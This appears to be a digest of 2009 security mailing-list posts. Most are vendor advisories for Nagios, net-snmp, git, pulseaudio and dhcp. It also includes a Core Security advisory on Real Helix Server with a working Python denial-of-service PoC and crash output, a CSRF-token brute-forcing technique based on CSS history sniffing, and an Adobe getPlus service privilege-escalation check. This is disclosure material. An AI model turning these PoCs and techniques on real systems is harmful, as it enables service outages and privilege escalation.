CORE-2009-0227: Real Helix DNA RTSP and SETUP request handler vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Real Helix DNA RTSP and SETUP request handler vulnerabilities 1. *Advisory Information* Title: Real Helix DNA RTSP and SETUP request handler vulnerabilities Advisory ID: CORE-2009-0227 Advisory URL: http://www.coresecurity.com/content/real-helix-dna Date published: 2009-07-17 Date of last update: 2009-07-17 Vendors contacted: RealNetworks Release mode: Forced release 2. *Vulnerability Information* Class: Denial of service (DoS) Remotely Exploitable: Yes Locally Exploitable: No Bugtraq ID: N/A CVE Name: CVE-2009-2533, CVE-2009-2534 3. *Vulnerability Description* Helix Server is a multi-format cross-platform streaming server. Two vulnerabilities have been found, that could allow a remote attacker to crash the Helix Server. During a 'RTSP' (SET_PARAMETERS) request handling, if an empty 'DataConvertBuffer' parameter is received by the server, it will raise an exception reading an invalid direction of memory. This exception is usually handled correctly but if you send this malformed request multiple times in a short period of time, it could render the Helix Server unresponsive and terminate its execution. During the 'SETUP' request handling, a 0x2F character is searched in the request line, if this byte is absent the process crashes with an access violation. 4. *Vulnerable packages* . Helix Server Version 12.x . Helix Mobile Server Version 12.x . The vulnerabilities were investigated on Helix Server Version 12.0.1.215 (Tahiti) Build 175002/12667 5. *Non-vulnerable packages* . Helix Server Version 13.0.0 . Helix Mobile Server Version 13.0.0 6. *Vendor Information, Solutions and Workarounds* According to the Security Update 071409HS [2] published by RealNetworks: The vulnerability is resolved on the following platforms by installing Version 13.0.0 of the Helix Server and the Helix Mobile Server. This only pertains to supported versions of the platforms listed below. The updated version will be available on your RealNetworks PAM site after 12:00 am PST, on July 14, 2009. . Red Hat Enterprise Linux 4 . Red Hat Enterprise Linux 5 . Sun Solaris 10 . Windows 2003 7. *Credits* These vulnerabilities were discovered and researched by Damian Frizza from Core Security Technologies. 8. *Technical Description / Proof of Concept Code* 8.1. *RTSP request handling Denial of Service (CVE-2009-2533)* The problem arises when the 'rmserver' process receives an 'RTSP (SET_PARAMETER)' request with no content in the 'DataConvertBuffer' parameter. The handling code reads at the memory location zero (0) and triggers an exception, which is handled correctly. However sending this malformed request multiple times renders the rmserver process unresponsive and subsequently stops its execution. The code section which triggers the exception is: /--- 00458066 |. C745 08 MOV DWORD PTR SS:[EBP+8],0 *Sets the content of the local variable to 0 0045806D |. 8B10 MOV EDX,DWORD PTR DS:[EAX] 0045806F |. 50 PUSH EAX 00458070 |. FF52 2C CALL DWORD PTR DS:[EDX+2C] 00458073 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00458076 |. 8B10 MOV EDX,DWORD PTR DS:[EAX] * Tries to read form 0 memory location - ---/ The following PoC code reproduces the issue: /--- import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('172.16.132.133',554)) setRequest = SET_PARAMETER / RTSP/1.0\r\n setRequest +=DataConvertBuffer: \r\n\r\n for i in range(5): print i s.send(setRequest) s.close() - ---/ The following output is written in the log file: /--- 4068: FATAL ERROR: The server has run out of memory! FATAL ERROR: Last request was rounded up to 1155072 bytes Trace: 0x00409C96 ... ... ... 0x FATAL ERROR: Server Terminated - ---/ 8.2. *Malformed SETUP command handling Denial of Service (CVE-2009-2534)* The problem arises when the 'SETUP' request is handled and the byte 0x2F is absent in the request line. While handling this kind of malformed request the server crashes with an access violation. The code section which triggers the access violation is: /--- 0047A490 |. 6A 2FPUSH 2F 0047A492 |. 56 PUSH ESI 0047A493 |. FF15 08425100CALL DWORD PTR DS:[MSVCR71.strchr] ; MSVCR71.strchr - ---/ if only the / (0x2F) character is sent, the program tries to copy from 0 and the access violation exception is raised. /--- 0047A490 |. 6A 2FPUSH 2F 0047A492 |. 56 PUSH ESI 0047A493 |. FF15 08425100CALL DWORD PTR DS:[MSVCR71.strchr] ; MSVCR71.strchr - ---/ The following code reproduces the issue: /--- import socket s =
[ GLSA 200907-15 ] Nagios: Execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200907-15 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Nagios: Execution of arbitrary code Date: July 19, 2009 Bugs: #245887, #249876, #275288 ID: 200907-15 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities in Nagios may lead to the execution of arbitrary code. Background == Nagios is an open source host, service and network monitoring program. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-analyzer/nagios-core 3.0.6-r2 = 3.0.6-r2 Description === Multiple vulnerabilities have been reported in Nagios: * Paul reported that statuswml.cgi does not properly sanitize shell metacharacters in the (1) ping and (2) traceroute parameters (CVE-2009-2288). * Nagios does not properly verify whether an authenticated user is authorized to run certain commands (CVE-2008-5027). * Andreas Ericsson reported that Nagios does not perform validity checks to verify HTTP requests, leading to Cross-Site Request Forgery (CVE-2008-5028). * An unspecified vulnerability in Nagios related to CGI programs, adaptive external commands, and writing newlines and submitting service comments has been reported (CVE-2008-6373). Impact == A remote authenticated or unauthenticated attacker may exploit these vulnerabilities to execute arbitrary commands or elevate privileges. Workaround == There is no known workaround at this time. Resolution == All Nagios users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v =net-analyzer/nagios-core-3.0.6-r2 NOTE: Users of the Nagios 2 branch can update to version 2.12-r1 which contains a patch to fix CVE-2009-2288. However, that branch is not supported upstream or in Gentoo and we are unaware whether the other vulnerabilities affect 2.x installations. References == [ 1 ] CVE-2008-5027 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5027 [ 2 ] CVE-2008-5028 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5028 [ 3 ] CVE-2008-6373 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6373 [ 4 ] CVE-2009-2288 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2288 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200907-15.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
Hacking CSRF Tokens using CSS History Hack
I was thinking about the problem of Cross Site Request Forgery and current mitigation strategies used in the Industry. In many of the real world applications I have tested so far, I see the use of random tokens appended as part of url. If the request fails to provide any token or provide a token with incorrect value, then the request is rejected. This prevents CSRF or any cross domain unauthorized function execution. Uptil now, it was considered infeasible for an attacker to discover your CSRF token using Brute Force Attacks on the server. The reasons being: 1. It generates lot of noise on the network and is slow. So most probably an IDS or Web App Firewall will pick up the malicious behavior and block your ip. For example, a Base16 CSRF token of length 5 characters (starting with a character) will generate approximately 393,216 requests. 2. Many applications are programmed to invalidate your session after it detects more than a certain number of requests with invalid token values. E.g. 30. I am going to change this belief by showing you a technique to quicky find csrf tokens without generating alerts. This technique is a client side attack, so there is almost no network traffic generated and hence, your server and IDS/Web App Firewalls wont notice it at all. This attack is based on the popular CSS History Hack found by Jeremiah Grossman 3 years ago. In this exploit, we discover the csrf token by brute forcing the various set of urls in browser history. We will try to embed different csrf token values as part of url and check if the user has visited that url. If yes, there is a good chance that the user is either using the same CSRF token in the current active session or might have used that token in a previous session. Once we have a list of all such tokens, we can just try our csrf attack on the server using that small list. Currently this attack is feasible for tokens with length of 5 characters or shorter. I tried it on a base16 string of length 5 and was able to brute force the entire key space in less than 2 minutes. Some of the prerequisites for this attack to work are either 1. CSRF token remains the same for a particular user session. e.g. csrf token=hash(session_id) OR 2. CSRF token submitted in older forms for the same session is accepted. Many times, this is the case as it enhances user experience and allows using forward and back browser buttons. Proof of Concept is available here. Before running the PoC, you need to change the url and csrftoken paramater values. For testing using the defaults, you need to first visit one of the following urls, e.g. 1. http://securethoughts.com/?param1=val1csrftoken=b59fe [change b59fe to any 5-digit base 16 string starting with a character] 2. http://tinyurl.com/l2lwgd [which is 301 redirect to previous url]. Note: http://www.securethoughts.com and http://securethoughts.com are treated differently while storing in browser history. A sample run will look like this http://securethoughts.com/wp-content/gallery/security/csrfcsshistory.jpg CSRF Token using CSS History Hack For making this attack unfeasible, 1. Server-Side Solution (for developers): * Make your CSRF tokens long enough (8 or more chars) to be unfeasible for a CLIENT SIDE attack. The ever-increasing processing power will make this attack feasible for longer tokens as well. * Store your CSRF token as part of hidden form field, rather than putting in url. * Use a different random token for every form submission and not accept any obsolete token, even for the same session. 2. Client-Side Solution (for your customers/users): * Use a browser plugin such as SafeHistory, which defends against visited-link-based tracking techniques. * Use the private browsing mode in your browser. And last, but not the least, XSS obliterates all the CSRF protections possible. So, get rid of XSS first. I would like to thank Jeremiah for providing his insightful feedback on this post.
Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges
Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges by Nine:Situations:Group description: Adobe downloader used to download updates for Adobe applications. Shipped with Acrobat Reader 9.x vendor: Nos Microsystems poc: C:\sc qc getPlus(R) Helper [SC] GetServiceConfig SUCCESS SERVICE_NAME: getPlus(R) Helper TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe LOAD_ORDER_GROUP : TAG: 0 DISPLAY_NAME : getPlus(R) Helper DEPENDENCIES : RPCSS SERVICE_START_NAME : LocalSystem C:\cacls C:\Programmi\NOS\bin\getPlus_HelperSvc.exe C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F -- [!!!] NT AUTHORITY\SYSTEM:F The executable files is installed with improper permissions, with full control for Builtin Users; a simple user can replace it with a binary of choice. At the next reboot it will run with SYSTEM privileges. original url: http://retrogod.altervista.org/9sg_adobe_local.html
Re: [GSEC-TZO-44-2009] One bug to rule them all - Firefox, IE, Safari,Opera, Chrome,Seamonkey,iPhone,iPod,Wii,PS3....
Hello Thierry! About your bug to rule them all I can tell, that it's interesting vulnerability and interesting research itself. I have found DoS vulnerabilities in multiple browsers many time, but I never tested in such many browsers and systems. So you made a large research (with help of those people who helped you with testing in different systems) - this DoS hole exists (or existed) in so many systems: different desktop browsers, email clients, browsers for mobile devices, game devices and possible other devices with support of JavaScript. Maybe some of DoS hole found by me can also work on multiple platforms, but I didn't tested in such large scale of devices (just in different browsers at my PC). Credit : Except Apple - nobody It's very common situation (with not serious relation of developers to security professionals who found holes in their programs). Especially in case of DoS vulnerabilities. IV. Disclosure timeline ~ Nothing particular to note, except the usual discussion about availability being a security issue. It is also very common for developers (browsers developers in particular) to not put DoS in category of security issues (even if they officially said that they acknowledge DoS as security issue). So nothing surprising :-) - I heard many times such statements from browsers developers. Thierry, I even planned to write here a large message on this subject (which I planned in the beginning of this year), but I canceled it due lack of time :-). In a short: the developers are not right and DoS is a security issue. I tested your vulnerability (your PoC) in all my browsers: Mozilla, Firefox, IE, Opera and Chrome. Here are results of my tests, which will be additional stroke to your picture of vulnerable browsers and systems. Mozilla 1.7.x is not vulnerable. And this is a reason why I like Mozilla 1.7.x, because it hasn't many of the holes which Mozilla added to new versions of their Firefox ;-). You wrote that Firefox allocates 2 GB of memory and then crashes. My Mozilla only allocates about 900 MB of memory and then stops this process (and stops using of CPU). So it was just small lag, without particular strain, so it's not vulnerable. Firefox 3.0.11 is not vulnerable (because was fixed in Firefox 3.0.5). IE6 is vulnerable. But my IE6 is vulnerable in different way then other browsers. You wrote that IE5,6,7,8 allocates 2 GB of memory and then crashes. In my case, browser only take CPU resources (over 50% at my two core processor, it'll be 100% on single core processor) without taking of memory. Opera 9.52 is vulnerable (because was fixed in version after Opera 9.64). You wrote that Opera allocated and commits as much memory as available and will not crash. In my case Opera takes more that 2 GB (almost all memory available) and then freezes. Google Chrome 1.0.154.48 is not vulnerable. You wrote that Chrome allocates 2 GB of memory and then crashes tab with a null pointer. In my case Chrome takes more than 2 GB of memory and then says its message about error at the page and frees all the memory. So in result almost no memory or CPU resources are used by the browser. You wrote that Chrome was patched (unknown version). As we see at least version Chrome 1.0.154.48 is not vulnerable. There is also one interesting thing. You mentioned bug #460713 in Mozilla's bugzilla. When yesterday I came via this link I found that this entry is closed for viewing (even for logged in users). So for some unknown reasons Mozilla closed access to bug #460713 (https://bugzilla.mozilla.org/show_bug.cgi?id=460713), even if it's resolved. As you wrote, this hole was fixed in Firefox 3.0.5. This version was released at 16th of December 2008, so from that time and till now Mozilla didn't open this bug. Why they did it? Do they have something to hide from people :-). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua !DSPAM:4a60eeae164971070416737!
[ MDVSA-2009:156 ] net-snmp
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:156 http://www.mandriva.com/security/ ___ Package : net-snmp Date: July 19, 2009 Affected: Corporate 3.0, Multi Network Firewall 2.0 ___ Problem Description: A vulnerability has been found and corrected in net-snmp: agent/snmp_agent.c in snmpd in net-snmp 5.0.9 in Red Hat Enterprise Linux (RHEL) 3 allows remote attackers to cause a denial of service (daemon crash) via a crafted SNMP GETBULK request that triggers a divide-by-zero error. NOTE: this vulnerability exists because of an incorrect fix for CVE-2008-4309 (CVE-2009-1887). This update provides fixes for this vulnerability. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1887 ___ Updated Packages: Corporate 3.0: ee03bc14d134aec02794f5808a137a4f corporate/3.0/i586/libnet-snmp5-5.1-7.5.C30mdk.i586.rpm 6b5f1b75e5eb468093c608ccfe82e9da corporate/3.0/i586/libnet-snmp5-devel-5.1-7.5.C30mdk.i586.rpm 57611a3244d6059044409a7f485a4994 corporate/3.0/i586/libnet-snmp5-static-devel-5.1-7.5.C30mdk.i586.rpm 285c902d9d1bbe55b9b479dcfbc2e95c corporate/3.0/i586/net-snmp-5.1-7.5.C30mdk.i586.rpm 0601ceadbd9c8fa5d2882125a4e981df corporate/3.0/i586/net-snmp-mibs-5.1-7.5.C30mdk.i586.rpm f644da3f56e42f98d9450215ed3fc0b6 corporate/3.0/i586/net-snmp-trapd-5.1-7.5.C30mdk.i586.rpm 7022788c7a0041801b3cbc4be50c94bd corporate/3.0/i586/net-snmp-utils-5.1-7.5.C30mdk.i586.rpm 6b6e9fd557325638d224583217acef16 corporate/3.0/SRPMS/net-snmp-5.1-7.5.C30mdk.src.rpm Corporate 3.0/X86_64: e3c100859868487b5699fdf4a66af63c corporate/3.0/x86_64/lib64net-snmp5-5.1-7.5.C30mdk.x86_64.rpm eadad6ef1be8b807d8c3c54a7d6c9ff2 corporate/3.0/x86_64/lib64net-snmp5-devel-5.1-7.5.C30mdk.x86_64.rpm 3719e39e53a600a43cfda88966875c52 corporate/3.0/x86_64/lib64net-snmp5-static-devel-5.1-7.5.C30mdk.x86_64.rpm d82287d4fc63404427c6f1b822351c27 corporate/3.0/x86_64/net-snmp-5.1-7.5.C30mdk.x86_64.rpm 2865fe323092fe69406238aa558feb04 corporate/3.0/x86_64/net-snmp-mibs-5.1-7.5.C30mdk.x86_64.rpm d102b2d018a45e725972be1d18e09b1c corporate/3.0/x86_64/net-snmp-trapd-5.1-7.5.C30mdk.x86_64.rpm 7898c08b000b4e1dac6ad55ba363108e corporate/3.0/x86_64/net-snmp-utils-5.1-7.5.C30mdk.x86_64.rpm 6b6e9fd557325638d224583217acef16 corporate/3.0/SRPMS/net-snmp-5.1-7.5.C30mdk.src.rpm Multi Network Firewall 2.0: 8260a17cc954c142159cea3d28b8a8f8 mnf/2.0/i586/libnet-snmp5-5.1-7.5.C30mdk.i586.rpm 9afe4298aec395f975a339de2758a756 mnf/2.0/i586/libnet-snmp5-devel-5.1-7.5.C30mdk.i586.rpm 05c8bc9c3dd9448b4c6e1c03014924de mnf/2.0/i586/libnet-snmp5-static-devel-5.1-7.5.C30mdk.i586.rpm 126012bdd2bd1f954ba3dbb803066974 mnf/2.0/i586/net-snmp-5.1-7.5.C30mdk.i586.rpm 481ef666a39b51b0d6dd602c3ce660c9 mnf/2.0/i586/net-snmp-mibs-5.1-7.5.C30mdk.i586.rpm b13d2b0d1e35af1c7e39127f113d31a6 mnf/2.0/i586/net-snmp-trapd-5.1-7.5.C30mdk.i586.rpm 57827cff12b30fb253c6728f5422db43 mnf/2.0/i586/net-snmp-utils-5.1-7.5.C30mdk.i586.rpm d727dcb4976f5373ace6629b8ec4b757 mnf/2.0/SRPMS/net-snmp-5.1-7.5.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKY3RDmqjQ0CJFipgRAljHAKCKTEe6CEyEsv0gL/3V37r0Gcd4MgCdHC3E K68aU4ggyRCjKfuHdgK2vF8= =N0l+ -END PGP SIGNATURE-
Re: PHP-Revista Multiple vulnerabilities
On Mon, 13 Apr 2009, mariani...@hotmail.com wrote: : Discovered by Sirdarckcat from elhacker.net By 'discovered', you mean 'copied from the disclosure in September 2006' right? CVE-2006-4605 through CVE-2006-4608.
[SECURITY] [DSA 1838-1] New pulseaudio packages fix privilege escalation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1838-1 secur...@debian.org http://www.debian.org/security/ Florian Weimer July 18, 2009 http://www.debian.org/security/faq - Package: pulseaudio Vulnerability : privilege escalation Problem type : local Debian-specific: no CVE Id(s) : CVE-2009-1894 Debian Bug : 537351 Tavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon does not drop privileges before re-executing itself, enabling local attackers to increase their privileges. The old stable distribution (etch) is not affected by this issue. For the stable distribution (lenny), this problem has been fixed in version 0.9.10-3+lenny1. For the unstable distribution (sid), this problem will be fixed soon. We recommend that you upgrade your pulseaudio packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Source archives: http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1.tar.gz Size/MD5 checksum: 1098761 e965d6170caf1b816a51e490f8bb8f49 http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1.dsc Size/MD5 checksum: 2302 982ec7228b8b5e2429be61e601f9be78 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_alpha.deb Size/MD5 checksum:70102 d25d7e00b3abd0d6db30f367b2c1588c http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_alpha.deb Size/MD5 checksum:80650 662d3cc6c33797509981c86aa2afa33f http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_alpha.deb Size/MD5 checksum: 198044 636571c01f35464050c342763ecd4743 http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_alpha.deb Size/MD5 checksum: 383882 2ba1337b6e4b6e63972a63a5cd28c8b7 http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_alpha.deb Size/MD5 checksum:68744 91d11ae4e02af5e5cbc055abe9a3b28c http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_alpha.deb Size/MD5 checksum: 407796 9d7f897db38e9ba8eaa0d043ae0714e8 http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_alpha.deb Size/MD5 checksum:69618 ca807ed9ee62e4df968482c0d3207def http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_alpha.deb Size/MD5 checksum:66140 d92032d26f5dfbecd48d01727d15b05a http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_alpha.deb Size/MD5 checksum:58652 993367567f24558d9a23fa741254dd42 http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_alpha.deb Size/MD5 checksum:82050 c2a27269fe5c81c1b449f6cb03f0baec http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_alpha.deb Size/MD5 checksum:68054 2aaf0fc7b38718792714ebbce7316b2d http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_alpha.deb Size/MD5 checksum:98628 ec19c6873cf7e7dc181153a63c74a749 http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_alpha.deb Size/MD5 checksum:64750 8a8e9f168dfd19cea9fa22df2fd0e3d8 http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_alpha.deb Size/MD5 checksum:77078 12ebdb1d926f8aa27734b38078e2d91c http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_alpha.deb Size/MD5 checksum: 104850 288ec4e4329c75bb5af5ad0d81064273 http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_alpha.deb Size/MD5 checksum:93578 85d609a4e77fde9c1df8b5b63bd63817 http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_alpha.deb Size/MD5 checksum: 283052 7c3bad69fba8d3e7adbaaa97771264b7
[ MDVSA-2009:155 ] git
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:155 http://www.mandriva.com/security/ ___ Package : git Date: July 19, 2009 Affected: 2009.1 ___ Problem Description: A vulnerability has been found and corrected in git: git-daemon in git 1.4.4.5 through 1.6.3 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a request containing extra unrecognized arguments (CVE-2009-2108). This update provides fixes for this vulnerability. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2108 ___ Updated Packages: Mandriva Linux 2009.1: 8df13e5dc18f1f49e5119a1f0ee22028 2009.1/i586/git-1.6.2.5-0.1mdv2009.1.i586.rpm 3ecabed848010ff0da9d01901908bdec 2009.1/i586/git-arch-1.6.2.5-0.1mdv2009.1.i586.rpm 7b482a3b50fe57278ca33b14898d26cd 2009.1/i586/git-core-1.6.2.5-0.1mdv2009.1.i586.rpm 413ee8849de553b859570e0031096e3d 2009.1/i586/git-core-oldies-1.6.2.5-0.1mdv2009.1.i586.rpm 5c316cb154b8992b3afbd179bf74dba7 2009.1/i586/git-cvs-1.6.2.5-0.1mdv2009.1.i586.rpm 7191f0ee69cb1863fba67bdb306e8a2f 2009.1/i586/git-email-1.6.2.5-0.1mdv2009.1.i586.rpm 535d852ed5a5410610112606b4c48102 2009.1/i586/gitk-1.6.2.5-0.1mdv2009.1.i586.rpm e109cdefd93c3febd126ee21ab10bd2e 2009.1/i586/git-svn-1.6.2.5-0.1mdv2009.1.i586.rpm f658300c4d0368f82fd98444fce4261a 2009.1/i586/gitview-1.6.2.5-0.1mdv2009.1.i586.rpm 6ed62f0448fd4aec1356299cac9d7875 2009.1/i586/gitweb-1.6.2.5-0.1mdv2009.1.i586.rpm 74dd7b0d6a0bc8d485aaf651334e6add 2009.1/i586/libgit-devel-1.6.2.5-0.1mdv2009.1.i586.rpm 501e8acb6a19e8567517ea47dd2c5b1a 2009.1/i586/perl-Git-1.6.2.5-0.1mdv2009.1.i586.rpm fc4d408843399806dec0d351e3d8d34a 2009.1/SRPMS/git-1.6.2.5-0.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: b2c19731c9eda6261dafd081898fa03b 2009.1/x86_64/git-1.6.2.5-0.1mdv2009.1.x86_64.rpm b40e5fd9d15b682d60d6781c537df053 2009.1/x86_64/git-arch-1.6.2.5-0.1mdv2009.1.x86_64.rpm e6e4d4756758e982b5ffcb47695e1ef0 2009.1/x86_64/git-core-1.6.2.5-0.1mdv2009.1.x86_64.rpm 02f877fb8cdcac2fc349e23e53c7efa1 2009.1/x86_64/git-core-oldies-1.6.2.5-0.1mdv2009.1.x86_64.rpm 989114ca6e1dd1bf79e226f4097caa79 2009.1/x86_64/git-cvs-1.6.2.5-0.1mdv2009.1.x86_64.rpm eaa00be9559e3fa41d8d9b6d07b58d17 2009.1/x86_64/git-email-1.6.2.5-0.1mdv2009.1.x86_64.rpm 270f8b08dfb63f63aa9492119c4c3b00 2009.1/x86_64/gitk-1.6.2.5-0.1mdv2009.1.x86_64.rpm 3048662bc566a66aae9c4804414c0c51 2009.1/x86_64/git-svn-1.6.2.5-0.1mdv2009.1.x86_64.rpm 66c429d250064ee8802abc09418a3231 2009.1/x86_64/gitview-1.6.2.5-0.1mdv2009.1.x86_64.rpm 525fcbdd247bf765e9bf7312732b92c5 2009.1/x86_64/gitweb-1.6.2.5-0.1mdv2009.1.x86_64.rpm a3f1a4a121a2c578bfc06d0a27543615 2009.1/x86_64/lib64git-devel-1.6.2.5-0.1mdv2009.1.x86_64.rpm 26284441a52b4b38310bbd35a517cfd8 2009.1/x86_64/perl-Git-1.6.2.5-0.1mdv2009.1.x86_64.rpm fc4d408843399806dec0d351e3d8d34a 2009.1/SRPMS/git-1.6.2.5-0.1mdv2009.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKY041mqjQ0CJFipgRAjiPAJ0SxBKZUuAq2+7BfunWxBOSp7MkZwCeMMWH 2E1ucAl8jYpEg+wogvhoy9w= =iPsa -END PGP SIGNATURE-
[ MDVSA-2009:153 ] dhcp
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:153 http://www.mandriva.com/security/ ___ Package : dhcp Date: July 17, 2009 Affected: 2008.1, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 ___ Problem Description: A vulnerability has been found and corrected in ISC DHCP: Integer overflow in the ISC dhcpd 3.0.x before 3.0.7 and 3.1.x before 3.1.1; and the DHCP server in EMC VMware Workstation before 5.5.5 Build 56455 and 6.x before 6.0.1 Build 55017, Player before 1.0.5 Build 56455 and Player 2 before 2.0.1 Build 55017, ACE before 1.0.3 Build 54075 and ACE 2 before 2.0.1 Build 55017, and Server before 1.0.4 Build 56528; allows remote attackers to cause a denial of service (daemon crash) or execute arbitrary code via a malformed DHCP packet with a large dhcp-max-message-size that triggers a stack-based buffer overflow, related to servers configured to send many DHCP options to clients (CVE-2007-0062). This update provides fixes for this vulnerability. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0062 ___ Updated Packages: Mandriva Linux 2008.1: e990b4848d5946aba0cb30da2032eab9 2008.1/i586/dhcp-client-3.0.7-0.1mdv2008.1.i586.rpm 528854b7ab0ff79a33239f704b4404c2 2008.1/i586/dhcp-common-3.0.7-0.1mdv2008.1.i586.rpm 8151495369c79ec8f38d22fb6d7497dd 2008.1/i586/dhcp-devel-3.0.7-0.1mdv2008.1.i586.rpm 886541fa55ffaacc37a53f339f524e42 2008.1/i586/dhcp-doc-3.0.7-0.1mdv2008.1.i586.rpm 09dba31d422d4f888d38411b9d22ec68 2008.1/i586/dhcp-relay-3.0.7-0.1mdv2008.1.i586.rpm 607f5c3a11eac14ba89345ce5ef8b47d 2008.1/i586/dhcp-server-3.0.7-0.1mdv2008.1.i586.rpm a77a2457b18c1451351a76fdb7472c78 2008.1/SRPMS/dhcp-3.0.7-0.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 3d443dc667a0ba0dfb28655beb79a7a0 2008.1/x86_64/dhcp-client-3.0.7-0.1mdv2008.1.x86_64.rpm a3b416aca289a48f85b5de72a1f4ac24 2008.1/x86_64/dhcp-common-3.0.7-0.1mdv2008.1.x86_64.rpm 71b324e15d4b58c4a5ab3aed3bbd0a99 2008.1/x86_64/dhcp-devel-3.0.7-0.1mdv2008.1.x86_64.rpm a9c7b5638c446b507b87c0ac5cb4c8f4 2008.1/x86_64/dhcp-doc-3.0.7-0.1mdv2008.1.x86_64.rpm 8d8ef19b3ccbbc7525a600c1896575fa 